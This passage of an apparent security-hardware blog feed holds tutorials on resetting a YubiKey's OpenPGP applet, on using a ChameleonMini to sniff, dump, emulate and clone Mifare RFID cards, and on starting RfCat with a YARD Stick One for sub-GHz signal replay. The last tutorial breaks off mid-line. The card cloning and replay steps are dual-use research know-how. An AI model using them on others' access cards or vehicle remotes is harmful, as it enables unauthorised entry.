href="#7、重置-YubiKey-4-PGP-功能" class="headerlink" title="7. Resetting the YubiKey 4 PGP function"></a>7. Resetting the YubiKey 4 PGP function</h2><p>Create a text file named <code>reset.txt</code> with the following content</p><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">/hex</span><br><span class="line">scd serialno</span><br><span class="line">scd apdu 00 20 00 81 08 40 40 40 40 40 40 40 40</span><br><span class="line">scd apdu 00 20 00 81 08 40 40 40 40 40 40 40 40</span><br><span class="line">scd apdu 00 20 00 81 08 40 40 40 40 40 40 40 40</span><br><span class="line">scd apdu 00 20 00 81 08 40 40 40 40 40 40 40 40</span><br><span class="line">scd apdu 00 20 00 83 08 40 40 40 40 40 40 40 40</span><br><span class="line">scd apdu 00 20 00 83 08 40 40 40 40 40 40 40 40</span><br><span class="line">scd apdu 00 20 00 83 08 40 40 40 40 40 40 40 40</span><br><span class="line">scd apdu 00 20 00 83 08 40 40 40 40 40 40 40 40</span><br><span class="line">scd apdu 00 e6 00 00</span><br><span class="line">scd apdu 00 44 00 00</span><br><span class="line">/echo Card has been successfully reset.</span><br></pre></td></tr></table></figure><p>Reset the YubiKey 4's OpenPGP card function</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">gpg-connect-agent -r reset.txt</span><br></pre></td></tr></table></figure><p>Unplug and re-insert the YubiKey, then view the OpenPGP card status. If this returns an error, the OpenPGP card function may not be enabled yet and has to be enabled manually with a command.</p><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">$ gpg --card-status</span><br><span class="line"></span><br><span class="line">gpg: selecting openpgp failed: Card error // OpenPGP card error</span><br><span class="line">gpg: OpenPGP card not available: Card error</span><br></pre></td></tr></table></figure><p>Enable the OpenPGP card function</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">gpg-connect-agent --hex</span><br><span class="line">> scd apdu 00 44 00 00</span><br><span class="line">D[0000] 90 00 ..</span><br><span class="line">OK</span><br><span class="line">> // press Enter to exit</span><br></pre></td></tr></table></figure><p>After the manual activation returns <code>OK</code>, you may need to unplug and re-insert the YubiKey again before viewing the OpenPGP card status</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ gpg --card-status</span><br><span class="line"></span><br><span class="line">Application ID ...: D2760001240102000060000000420000</span><br><span class="line">Version ..........: 2.1</span><br><span class="line">Manufacturer .....: Yubico</span><br><span 
class="line">Serial number ....: 00000042</span><br><span class="line">Name of cardholder: [not <span class="built_in">set</span>]</span><br><span class="line">Language prefs ...: [not <span class="built_in">set</span>]</span><br><span class="line">Sex ..............: unspecified</span><br><span class="line">URL of public key : [not <span class="built_in">set</span>]</span><br><span class="line">Login data .......: [not <span class="built_in">set</span>]</span><br><span class="line">Signature PIN ....: forced</span><br><span class="line">Key attributes ...: 2048R 2048R 2048R</span><br><span class="line">Max. PIN lengths .: 127 127 127</span><br><span class="line">PIN retry counter : 3 0 3</span><br><span class="line">Signature counter : 0</span><br><span class="line">Signature key ....: [none]</span><br><span class="line">Encryption key....: [none]</span><br><span class="line">Authentication key: [none]</span><br><span class="line">General key info..: [none]</span><br></pre></td></tr></table></figure><p>After the reset, the OpenPGP card can be configured again.</p><hr><h3 id="链接"><a href="#链接" class="headerlink" title="Links"></a>Links</h3><ul><li><a href="https://www.gnupg.org/gph/en/manual.html" target="_blank" rel="noopener">The GNU Privacy Handbook</a></li><li><a href="https://developers.yubico.com/PGP/" target="_blank" rel="noopener">YubiKey PGP</a></li><li><a href="https://www.yubico.com/support/knowledge-base/categories/articles/use-yubikey-openpgp/" target="_blank" rel="noopener">How to Use Your YubiKey With OpenPGP</a></li><li><a href="https://developers.yubico.com/yubikey-piv-manager/PIN_and_Management_Key.html" target="_blank" rel="noopener">PIN and Management Key</a></li><li><a href="https://www.yubico.com/support/knowledge-base/categories/articles/reset-applet-yubikey/" target="_blank" rel="noopener">How to Reset Your Applet on Your YubiKey</a></li><li><a href="https://developers.yubico.com/ykneo-openpgp/ResetApplet.html" target="_blank" rel="noopener">YubiKey ResetApplet</a></li><li><a 
href="https://openpgpcard.org/makecard/" target="_blank" rel="noopener">Make OpenPGP Card</a></li><li><a href="https://github.com/drduh/YubiKey-Guide" target="_blank" rel="noopener">Guide to using YubiKey as a SmartCard for GPG and SSH</a></li><li><a href="https://spin.atomicobject.com/2014/02/09/gnupg-openpgp-smartcard/" target="_blank" rel="noopener">Using an OpenPGP Smartcard with GnuPG</a></li><li><a href="https://www.sidorenko.io/blog/2014/11/04/yubikey-slash-openpgp-smartcards-for-newbies/" target="_blank" rel="noopener">Yubikey/OpenPGP Smartcards for Newbies</a></li><li><a href="https://www.esev.com/blog/post/2015-01-pgp-ssh-key-on-yubikey-neo/" target="_blank" rel="noopener">PGP and SSH keys on a Yubikey NEO</a></li><li><a href="https://www.jfry.me/articles/2015/gpg-smartcard/" target="_blank" rel="noopener">Using GPG with Smart Cards</a></li></ul>]]></content>
<summary type="html">
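<p><a href="https://www.yubico.com/" target="_blank" rel="noopener">YubiKey</a> is a hardware tool for secure authentication. Of its product models, the YubiKey 4, YubiKey 4 Nano, YubiKey 4C, YubiKey NEO and YubiKey NEO-n include the OpenPGP Card function.</p>
<p>You can move your private keys into the YubiKey and plug it in only when you need them, without worrying about the private keys leaking or being stolen by malware. It can also be used on multiple operating systems.</p>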
</summary>
<category term="YubiKey" scheme="https://blog.iternull.com/tags/YubiKey/"/>
<category term="PGP" scheme="https://blog.iternull.com/tags/PGP/"/>
</entry>
<entry>
<title>ChameleonMini Tutorial</title>
<link href="https://blog.iternull.com/posts/2017/05/22/ChameleonMini-Tutorial.html"/>
<id>https://blog.iternull.com/posts/2017/05/22/ChameleonMini-Tutorial.html</id>
<published>2017-05-22T15:58:47.000Z</published>
<updated>2018-07-05T05:38:22.526Z</updated>
<content type="html"><![CDATA[<p><a href="https://github.com/emsec/ChameleonMini" target="_blank" rel="noopener">ChameleonMini</a> is an open-source hardware project: a programmable NFC security analysis tool that can be used to sniff, emulate and clone contactless smart cards (RFID cards).<br>There are two common versions of the ChameleonMini, <strong>ChameleonMini Rev.E</strong> and <strong>ChameleonMini Rev.G</strong>. Rev.G is the newer, upgraded version and is powered by a built-in battery.</p><a id="more"></a><h4 id="Rev-G-版本特点"><a href="#Rev-G-版本特点" class="headerlink" title="Rev.G features"></a>Rev.G features</h4><ul><li>Firmware support for the ISO14443A codec (emulation and reader)</li><li>Firmware support for Mifare Classic 1K and 4K emulation (4-byte and 7-byte UID)</li><li>Firmware support for Mifare Ultralight emulation</li><li>Hardware support for ASK modulation (both 10% and 100%), covering almost all available card standards</li><li>Hardware support for ASK and BPSK load modulation using a subcarrier</li><li>Modular firmware structure that makes it easy to extend to other cards and standards</li><li>Fast and reliable firmware updates through the Atmel DFU bootloader, so the hardware only needs to be programmed once</li><li>Can be controlled over CDC, via the <a href="http://www.fourwalledcubicle.com/LUFA.php" target="_blank" rel="noopener">LUFA USB stack</a>, using fully documented AT-like commands</li><li>Can store up to 8 virtualized cards, each up to 8 KB in size, in the ChameleonMini's non-volatile memory</li><li>Card data can easily be uploaded and downloaded via the command line and X-MODEM</li><li>The UID of ISO14443A-compliant cards can easily be obtained in reader mode</li><li>The type of an ISO14443A card (Mifare Ultralight, Mifare Classic 1k, …) can also be identified in reader mode</li><li>Transparent/manual ISO14443A reader: send custom data bits and receive the card's response</li><li>This allows the ChameleonMini to be used with standard serial terminal software as well as user-written scripts and applications</li></ul><h3 id="安装客户端"><a href="#安装客户端" class="headerlink" title="Installing a client"></a>Installing a client</h3><p>The ChameleonMini is commonly controlled in two cross-platform ways: by typing commands in serial terminal software, or with the Python tool that ships with the official project. On Windows there is also a third-party GUI client.</p><h4 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h4><p>On Windows you first need to install the driver; for the procedure, see <a href="http://wiki.radiowar.org/Proxmark3#Proxmark3.E9.A9.B1.E5.8A.A8.E5.AE.89.E8.A3.85" target="_blank" rel="noopener">Proxmark3 driver installation</a>. The driver files are in the ChameleonMini/Drivers/ folder of the <a href="https://github.com/emsec/ChameleonMini" target="_blank" rel="noopener">ChameleonMini</a> project (for the RevE version, in the RevE/ folder).<br>On Windows you can also operate the device with command-line software that supports COM serial-port communication, such as <a href="https://osdn.net/projects/ttssh2/releases/" target="_blank" rel="noopener">TeraTerm</a> or <a 
href="https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html" target="_blank" rel="noopener">PuTTY</a>. This is not explained again here; see the usage in the Linux section.</p><p>ChameleonMini GUI client: <a href="http://bronken.de/chameleonminigui/" target="_blank" rel="noopener">http://bronken.de/chameleonminigui/</a></p><h4 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h4><p>On Linux you can control the hardware with clients such as <code>cu, minicom, socat</code>; here we use <code>socat</code>.</p><p>Install socat</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">apt-get install socat</span><br></pre></td></tr></table></figure><p>Connect the ChameleonMini to the computer and control the device from the command line.</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">socat - /dev/ttyACM0,crnl</span><br></pre></td></tr></table></figure><p>Get the firmware version</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">VERSION? // the command you type (no prompt is displayed here)</span><br><span class="line">101:OK WITH TEXT // status returned by the device</span><br><span class="line">Chameleon-Mini 150304 using LUFA 130901 compiled with AVR-GCC 4.8.1 // data returned by the device</span><br></pre></td></tr></table></figure><p>Get and set the configuration</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">config? 
// the command you type (show the currently configured card)</span><br><span class="line">101:OK WITH TEXT // status returned by the device</span><br><span class="line">MF_ULTRALIGHT // data returned by the device</span><br><span class="line">config // the command you type (list all configurable cards)</span><br><span class="line">101:OK WITH TEXT // status returned by the device</span><br><span class="line">NONE,MF_ULTRALIGHT,MF_CLASSIC_1K,MF_PLUS1K_7B,MF_CLASSIC_4K,ISO14443A_SNIFF // data returned by the device</span><br><span class="line">config=MF_CLASSIC_1K // the command you type (set the current card to Mifare Classic 1K)</span><br><span class="line">100:OK // status returned by the device</span><br><span class="line">config? // the command you type (show the currently configured card)</span><br><span class="line">101:OK WITH TEXT // status returned by the device</span><br><span class="line">MF_CLASSIC_1K // data returned by the device (currently configured as a Mifare Classic 1K card)</span><br></pre></td></tr></table></figure><p>Set the UID of the emulated Mifare Classic 1K card</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">uid? // the command you type (show the current UID)</span><br><span class="line">101:OK WITH TEXT // status returned by the device</span><br><span class="line">00000000 // data returned by the device (the current UID is 00000000)</span><br><span class="line">uid=ABCD1234 // the command you type (set the UID to ABCD1234)</span><br><span class="line">100:OK // status returned by the device</span><br><span class="line">uid? 
// the command you type (show the current UID)</span><br><span class="line">101:OK WITH TEXT // status returned by the device</span><br><span class="line">ABCD1234 // data returned by the device (the current UID is ABCD1234)</span><br></pre></td></tr></table></figure><h4 id="ChamTool-py"><a href="#ChamTool-py" class="headerlink" title="ChamTool.py"></a>ChamTool.py</h4><p>ChamTool.py is a client tool written in Python that ships with the official ChameleonMini project and works across platforms.</p><p>Install Python and the dependencies</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">apt-get install python3 python3-pip</span><br><span class="line"><span class="built_in">cd</span> ChameleonMini/Software/</span><br><span class="line">pip install -r requirements.txt</span><br></pre></td></tr></table></figure><p>Usage</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ ./chamtool.py -h</span><br><span class="line">usage: chamtool.py [-h] [-v] [-p COMPORT] [-u DUMPFILE] [-d DUMPFILE]</span><br><span class="line"> [-l LOGFILE] [-i] [-s [{1,2,3,4,5,6,7,8}]] [-U [UID]]</span><br><span class="line"> [-c [CFGNAME]] [-lb [ACTION]] [-rb [ACTION]]</span><br><span class="line"> [-gl [FUNCTION]] [-rl [FUNCTION]]</span><br><span class="line"></span><br><span class="line">Controls the Chameleon through the <span class="built_in">command</span> line</span><br><span class="line"></span><br><span class="line">optional arguments:</span><br><span class="line"> -h, --<span class="built_in">help</span> show this <span class="built_in">help</span> message and <span class="built_in">exit</span></span><br><span class="line"> -v, --verbose output verbose</span><br><span class="line"> -p COMPORT, --port COMPORT</span><br><span class="line"> specify device<span class="string">'s comport</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Chameleon commands:</span></span><br><span class="line"><span class="string"> These arguments can appear multiple times and are executed in the order</span></span><br><span class="line"><span class="string"> they are given on the command line. 
Some of these arguments can be used</span></span><br><span class="line"><span class="string"> with '</span>?<span class="string">' as parameter to get a list of suggestions.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> -u DUMPFILE, --upload DUMPFILE</span></span><br><span class="line"><span class="string"> upload a card dump</span></span><br><span class="line"><span class="string"> -d DUMPFILE, --download DUMPFILE</span></span><br><span class="line"><span class="string"> download a card dump</span></span><br><span class="line"><span class="string"> -l LOGFILE, --log LOGFILE</span></span><br><span class="line"><span class="string"> download the device log</span></span><br><span class="line"><span class="string"> -i, --info retrieve the version information</span></span><br><span class="line"><span class="string"> -s [{1,2,3,4,5,6,7,8}], --setting [{1,2,3,4,5,6,7,8}]</span></span><br><span class="line"><span class="string"> retrieve or set the current setting</span></span><br><span class="line"><span class="string"> -U [UID], --uid [UID]</span></span><br><span class="line"><span class="string"> retrieve or set the current UID</span></span><br><span class="line"><span class="string"> -c [CFGNAME], --config [CFGNAME]</span></span><br><span class="line"><span class="string"> retrieve or set the current configuration</span></span><br><span class="line"><span class="string"> -lb [ACTION], --lbutton [ACTION]</span></span><br><span class="line"><span class="string"> retrieve or set the current left button action</span></span><br><span class="line"><span class="string"> -rb [ACTION], --rbutton [ACTION]</span></span><br><span class="line"><span class="string"> retrieve or set the current right button action</span></span><br><span class="line"><span class="string"> -gl [FUNCTION], --gled [FUNCTION]</span></span><br><span class="line"><span class="string"> retrieve or set the current green led 
function</span></span><br><span class="line"><span class="string"> -rl [FUNCTION], --rled [FUNCTION]</span></span><br><span class="line"><span class="string"> retrieve or set the current red led function</span></span><br></pre></td></tr></table></figure><h3 id="读取-RFID-卡"><a href="#读取-RFID-卡" class="headerlink" title="读取 RFID 卡"></a>Reading an RFID card</h3><p>Open a terminal and enter the commands</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">CONFIG=ISO14443A_READER // Command you enter</span><br><span class="line">_G@ISO14443A READER_100:OK // Status returned by the device</span><br><span class="line"></span><br><span class="line">IDENTIFY // Command you enter</span><br><span class="line">101:OK WITH TEXT // Status returned by the device</span><br><span class="line">MIFARE Cڱ__ 1▒ .A.▒s.A@.▒t▒6u/=<span class="variable">$A</span> // Data returned by the device (likewise below)</span><br><span class="line">ATQA: 0400</span><br><span class="line">UID: ABCD1234</span><br><span class="line">SAK: 08</span><br></pre></td></tr></table></figure><h3 id="嗅探-RFID-卡"><a href="#嗅探-RFID-卡" class="headerlink" title="嗅探 RFID 卡"></a>Sniffing an RFID card</h3><p>To sniff an RFID card you also need an ACR122U reader and an ISO14443A-compliant RFID card to sniff.</p><p>First connect the ACR122U and the ChameleonMini to the computer, then place the ChameleonMini on the ACR122U and place the card to be sniffed on the ChameleonMini.</p><p>Enter the command in the terminal program</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">LOGMODE=TERMINAL // Command you enter</span><br><span class="line">100:OKE=TERMINAL // Status returned by the device</span><br></pre></td></tr></table></figure><p>Start sniffing</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">CONFIG=ISO14443A_SNIFF // Command you enter</span><br><span class="line">100:OK=ISO14443A_SNIFF // Status returned by the device</span><br><span class="line">...</span><br><span class="line">... // Sniffed data is returned, looking like garbage (omitted here)</span><br><span class="line">...</span><br></pre></td></tr></table></figure><p><img src="//files.iternull.com/images/2017-05-22_01-0001.png" alt=""></p><p>Stop sniffing</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">CONFIG=NONE</span><br></pre></td></tr></table></figure><p>Sniffing with ChamTool.py</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">./chamtool.py -v -p /dev/ttyACM0 -c ISO14443A_SNIFF</span><br></pre></td></tr></table></figure><h3 id="模拟-RFID-卡"><a href="#模拟-RFID-卡" class="headerlink" title="模拟 RFID 卡"></a>Emulating an RFID card</h3><p>To emulate another RFID card with the ChameleonMini, you first need that card's complete sector data, which you then upload to the ChameleonMini's on-board storage before starting emulation. The file is a hexadecimal file in <code>.mfd</code> format.<br>To obtain the complete sector data of the original RFID card, you can use a Proxmark3, or an ACR122U or PN532 together with mfoc, to recover the keys of all sectors of the card and dump the data of all sectors.<br>The dumped data may be in ASCII plain-text format or in the same hexadecimal format as on the card. The ChameleonMini only supports importing the hexadecimal format, so data in any other format must first be converted to a hexadecimal file.<br>The Proxmark3 client ships with the conversion tool <code>pm3_eml2mfd.py</code>; you can also create and edit a card's data by hand with a hex editor such as <code>HxD Hex Editor</code> or <code>WinHex</code>.<br>Once you have the dump file, you can connect to the ChameleonMini's serial port with SecureCRT or another terminal and upload the file.<br>Enter the <code>UPLOAD</code> command in the terminal, then open Transfer > Send Xmodem > and select the file you want to upload.<br>After the upload completes, set your card type in the terminal, for example <code>CONFIG=MF_CLASSIC_1K</code> sets the card to Mifare Classic 1K.</p><p>Uploading the card data file with ChamTool.py</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">./chamtool.py -p /dev/ttyACM0 -u 
card.mfd</span><br></pre></td></tr></table></figure><h3 id="模拟多张-RFID-卡"><a href="#模拟多张-RFID-卡" class="headerlink" title="模拟多张 RFID 卡"></a>Emulating multiple RFID cards</h3><p>Emulating multiple cards relies on the ChameleonMini's button function to switch between cards, and different card data can be uploaded for each one. The button function is configurable, and up to 8 cards can be stored and switched between.</p><p>Enter the <code>button</code> command in the terminal</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">button // Show the button configuration options</span><br><span class="line">101:OK WITH TEXT</span><br><span class="line">NONE,UID_RANDOM,UID_LEFT_INCREMENT,UID_RIGHT_INCREMENT,UID_LEFT_DECREMENT,UID_RIGHT_DECREMENT,CYCLE_SETTINGS,STORE_MEM,RECALL_MEM</span><br></pre></td></tr></table></figure><p>Configure the button to switch cards</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">button=CYCLE_SETTINGS // Enable card switching on the button</span><br><span class="line">100:OK</span><br><span class="line">setting? // Show the current card number</span><br><span class="line">101:OK WITH TEXT</span><br><span class="line">1</span><br><span class="line">config? // Show the configured type of the current card</span><br><span class="line">101:OK WITH TEXT</span><br><span class="line">MF_CLASSIC_1K</span><br><span class="line">uid? // Show the current UID</span><br><span class="line">101:OK WITH TEXT</span><br><span class="line">ABCD1234</span><br><span class="line">setting=2 // Set the card number</span><br><span class="line">100:OK</span><br><span class="line">setting? // Show the current card number</span><br><span class="line">101:OK WITH TEXT</span><br><span class="line">2</span><br><span class="line">config=MF_ULTRALIGHT // Set the card type</span><br><span class="line">100:OK</span><br><span class="line">config? // Show the configured type of the current card</span><br><span class="line">101:OK WITH TEXT</span><br><span class="line">MF_ULTRALIGHT</span><br><span class="line">uid=AABBCCDDEEFF11 // Set the UID</span><br><span class="line">100:OK</span><br><span class="line">uid? // Show the current UID</span><br><span class="line">101:OK WITH TEXT</span><br><span class="line">AABBCCDDEEFF11</span><br></pre></td></tr></table></figure><p>Button settings and what they do</p><table><thead><tr><th style="text-align:left">Button setting</th><th style="text-align:left">Description</th></tr></thead><tbody><tr><td style="text-align:left">NONE</td><td style="text-align:left">Do nothing</td></tr><tr><td style="text-align:left">UID_RANDOM</td><td style="text-align:left">Generate a random UID</td></tr><tr><td style="text-align:left">UID_LEFT_INCREMENT</td><td style="text-align:left">Increment the leftmost hexadecimal value of the UID by 1</td></tr><tr><td style="text-align:left">UID_RIGHT_INCREMENT</td><td style="text-align:left">Increment the rightmost hexadecimal value of the UID by 1</td></tr><tr><td style="text-align:left">UID_LEFT_DECREMENT</td><td style="text-align:left">Decrement the leftmost hexadecimal value of the UID by 1</td></tr><tr><td style="text-align:left">UID_RIGHT_DECREMENT</td><td style="text-align:left">Decrement the rightmost hexadecimal value of the UID by 1</td></tr><tr><td style="text-align:left">CYCLE_SETTINGS</td><td style="text-align:left">Let the button switch between multiple cards</td></tr><tr><td style="text-align:left">STORE_MEM</td><td style="text-align:left">Store memory</td></tr><tr><td style="text-align:left">RECALL_MEM</td><td 
style="text-align:left">Recall memory (restore the stored memory)</td></tr></tbody></table><h3 id="烧录固件"><a href="#烧录固件" class="headerlink" title="烧录固件"></a>Flashing the firmware</h3><p>The ChameleonMini's MCU is a processor from Atmel's AVR ATxmega series, so the firmware is flashed the same way as on other AVR microcontrollers.<br>You can flash the bootloader and firmware with a hardware programmer such as the AVRISP mkII or USBasp together with programming software such as Atmel Studio or AVRDUDE.<br>Wiring pins: the row of unsoldered pads at the bottom of the Chameleon-Mini are the standard ATxmega programming pins. Taking the side with the surface-mount components as the front, the 3 pins on the front are <code>VCC</code>, <code>NC</code>, <code>GND</code>, and the 3 directly opposite on the back are <code>PDI_DATA</code>, <code>NC</code>, <code>PDI_CLK/RST</code>.</p><p><img src="//files.iternull.com/images/2017-05-22_01-0002.jpg" alt=""></p><h3 id="升级固件"><a href="#升级固件" class="headerlink" title="升级固件"></a>Upgrading the firmware</h3><p>The Chameleon Mini uses a USB DFU bootloader, so the firmware can be upgraded directly over a USB connection. (This is supported only on boards that already have the bootloader flashed; a bare board you built yourself needs the bootloader flashed first.)</p><p>Upgrading the firmware on Linux</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">apt-get install avra avrdude</span><br><span class="line">avrdude -c flip2 -p ATXMega128A4U -B 60 -P usb -U application:w:Chameleon-Mini.hex:i -U eeprom:w:Chameleon-Mini.eep:i</span><br></pre></td></tr></table></figure><p>Upgrading the firmware on Windows</p><ol><li>Download <a href="https://sourceforge.net/projects/dfu-programmer/files/dfu-programmer/0.7.2/dfu-programmer-win-0.7.2.zip/download" target="_blank" rel="noopener">dfu-programmer 0.7.2</a></li><li>Extract it to a directory, open the folder dfu-prog-usb-1.2.2, and install the <code>atmel_usb_dfu.inf</code> driver. (Right-click > Install)</li><li>Copy dfu-programmer.exe into the same directory as the hex and eep files.</li><li>Copy ChameleonFirmwareUpgrade.bat into the same directory as the hex and eep files.</li><li>Run ChameleonFirmwareUpgrade.bat as administrator and wait for the firmware upgrade to finish. (On success the ChameleonMini's green LED should light up.)</li></ol><hr><h3 id="链接"><a href="#链接" class="headerlink" title="链接"></a>Links</h3><ul><li><a href="https://github.com/emsec/ChameleonMini/wiki" target="_blank" rel="noopener">ChameleonMini Wiki</a></li><li><a href="https://rawgit.com/emsec/ChameleonMini/master/Doc/Doxygen/html/index.html" 
target="_blank" rel="noopener">Chameleon-Mini Documentation</a></li><li><a href="https://www.kickstarter.com/projects/1980078555/chameleonmini-a-versatile-nfc-card-emulator-and-mo" target="_blank" rel="noopener">Kickstarter - ChameleonMini</a></li><li><a href="https://store.ryscc.com/products/chameleonmini" target="_blank" rel="noopener">ChameleonMini - Rysc Corp</a></li><li><a href="https://store.ryscc.com/blogs/news/54097857-getting-started-with-the-chameleonmini" target="_blank" rel="noopener">Getting Started with the ChameleonMini RevE-2</a></li><li><a href="https://store.ryscc.com/blogs/news/34542273-unleash-the-chameleons" target="_blank" rel="noopener">Unleash the Chameleons!</a></li><li><a href="https://store.ryscc.com/blogs/news/86357121-installing-driver-for-chameleonmini-on-windows-7" target="_blank" rel="noopener">Installing Driver for ChameleonMini on Windows 7</a></li><li><a href="https://store.ryscc.com/blogs/news/77102465-sniffing-tags-with-the-chameleonmini" target="_blank" rel="noopener">Sniffing Tags with the ChameleonMini</a></li><li><a href="https://store.ryscc.com/blogs/news/39859649-emulating-mifare-4k-tags-with-the-chameleonmini" target="_blank" rel="noopener">Emulating Mifare 4K Tags with the ChameleonMini RevE-2</a></li><li><a href="https://store.ryscc.com/blogs/news/37733761-how-to-emulate-multiple-smart-cards-at-once-using-the-chameleonmini" target="_blank" rel="noopener">How to Emulate Multiple Smart Cards at once using the ChameleonMini</a></li></ul>]]></content>
<summary type="html">
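<p><a href="https://github.com/emsec/ChameleonMini" target="_blank" rel="noopener">ChameleonMini</a> is an open-source hardware project for a programmable NFC security analysis tool that can be used to sniff, emulate, and clone contactless smart cards (RFID cards).<br>There are two common versions of the ChameleonMini, <strong>ChameleonMini Rev.E</strong> and <strong>ChameleonMini Rev.G</strong>; Rev.G is the latest upgraded version and has a built-in battery.</p>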
</summary>
<category term="Hardware" scheme="https://blog.iternull.com/tags/Hardware/"/>
<category term="RFID" scheme="https://blog.iternull.com/tags/RFID/"/>
<category term="ChameleonMini" scheme="https://blog.iternull.com/tags/ChameleonMini/"/>
</entry>
<entry>
<title>YARD Stick One Tutorial</title>
<link href="https://blog.iternull.com/posts/2017/05/17/YARD-Stick-One-Tutorial.html"/>
<id>https://blog.iternull.com/posts/2017/05/17/YARD-Stick-One-Tutorial.html</id>
<published>2017-05-17T15:27:28.000Z</published>
<updated>2017-06-01T14:16:54.759Z</updated>
<content type="html"><![CDATA[<p><a href="https://greatscottgadgets.com/yardstickone/" target="_blank" rel="noopener">YARD Stick One</a> is a sub-1 GHz USB wireless transceiver based on TI's <a href="http://www.ti.com/product/CC1110-CC1111" target="_blank" rel="noopener">CC1111</a> chip. You can use the YARD Stick One to replay various remote-control signals, to do security research on car remote locks, and so on.</p><a id="more"></a><ul><li>Half-duplex transmit and receive</li><li>Operating frequencies (official): 300 - 348 MHz, 391 - 464 MHz, and 782 - 928 MHz</li><li>Operating frequencies (unofficial): 281 - 361 MHz, 378 - 481 MHz, and 749 - 962 MHz</li><li>Modulations: ASK, OOK, GFSK, 2-FSK, 4-FSK, MSK</li><li>Data rate: 500 kbps</li><li>Full-Speed USB 2.0</li><li>SMA female antenna connector (50 ohms)</li><li>Software-controlled antenna port power (max 50 mA at 3.3 V)</li><li>Low-pass filter for eliminating harmonics when operating in the 800 and 900 MHz bands</li><li>GoodFET-compatible expansion and programming header</li><li>GIMME-compatible programming test points</li><li>Open-source hardware</li></ul><p>The official operating frequencies are those supported by the Texas Instruments (TI) CC1111 chip. In practice, however, testing has shown the unofficial ranges to be reliable and to work normally.</p><ul><li>Note: YARD Stick One is not supported on Windows. Although third parties have tried modifying the firmware to support the Linux subsystem of Windows 10, there is currently no official announcement of Windows support.</li></ul><h2 id="1-使用"><a href="#1-使用" class="headerlink" title="1. 使用"></a>1. Usage</h2><p>YARD Stick One is not compatible with any general-purpose SDR software; you can only use its designated client, <a href="https://bitbucket.org/atlas0fd00m/rfcat" target="_blank" rel="noopener">RfCat</a>.</p><h3 id="1-1-安装-RfCat"><a href="#1-1-安装-RfCat" class="headerlink" title="1.1 安装 RfCat"></a>1.1 Installing RfCat</h3><p>Install from source</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">apt-get install python-usb</span><br><span class="line">wget https://bitbucket.org/atlas0fd00m/rfcat/downloads/rfcat_170508.tgz</span><br><span class="line">tar xvzf rfcat_170508.tgz</span><br><span class="line"><span class="built_in">cd</span> rfcat_170508/</span><br><span class="line">python setup.py install</span><br></pre></td></tr></table></figure><p>Kali Linux</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">apt-get install rfcat</span><br></pre></td></tr></table></figure><h3 id="1-2-RfCat-帮助"><a href="#1-2-RfCat-帮助" class="headerlink" title="1.2 RfCat 帮助"></a>1.2 RfCat help</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">rfcat -h</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">usage: rfcat [-h] [-r] [-i INDEX] [-s] [-f BASEFREQ] [-c INC] [-n SPECCHANS]</span><br><span class="line"> [--bootloader] [--force]</span><br><span class="line"></span><br><span class="line">optional arguments:</span><br><span class="line"> -h, --help show this help message and exit</span><br><span class="line"> -r, --research Interactive Python and the "d" instance to talk to</span><br><span class="line"> your dongle. 
melikey longtime.</span><br><span class="line"> -i INDEX, --index INDEX</span><br><span class="line"> -s, --specan start spectrum analyzer</span><br><span class="line"> -f BASEFREQ, --basefreq BASEFREQ</span><br><span class="line"> -c INC, --inc INC</span><br><span class="line"> -n SPECCHANS, --specchans SPECCHANS</span><br><span class="line"> --bootloader trigger the bootloader (use in order to flash the</span><br><span class="line"> dongle)</span><br><span class="line"> --force use this to make sure you want to set bootloader mode</span><br><span class="line"> (you *must* flash after setting --bootloader)</span><br></pre></td></tr></table></figure><h3 id="1-3-频谱分析"><a href="#1-3-频谱分析" class="headerlink" title="1.3 频谱分析"></a>1.3 Spectrum analysis</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">rfcat -s -f 433e6</span><br></pre></td></tr></table></figure><p><img src="//files.iternull.com/images/2017-05-17_01-0002.png" alt=""></p><h3 id="1-4-RfCat-命令行"><a href="#1-4-RfCat-命令行" class="headerlink" title="1.4 RfCat 命令行"></a>1.4 RfCat command line</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">rfcat -r</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="string">'RfCat, the greatest thing since Frequency Hopping!'</span></span><br><span class="line"></span><br><span class="line">Research Mode: enjoy the raw power of rflib</span><br><span class="line"></span><br><span class="line">currently your environment has an object called <span class="string">"d"</span> <span class="keyword">for</span> dongle. this is how</span><br><span class="line">you interact with the rfcat dongle:</span><br><span class="line"> >>> d.ping()</span><br><span class="line"> >>> d.setFreq(433000000) // Set the signal frequency</span><br><span class="line"> >>> d.setMdmModulation(MOD_ASK_OOK) // Set the signal modulation mode</span><br><span class="line"> >>> d.makePktFLEN(250)</span><br><span class="line"> >>> d.RFxmit(<span 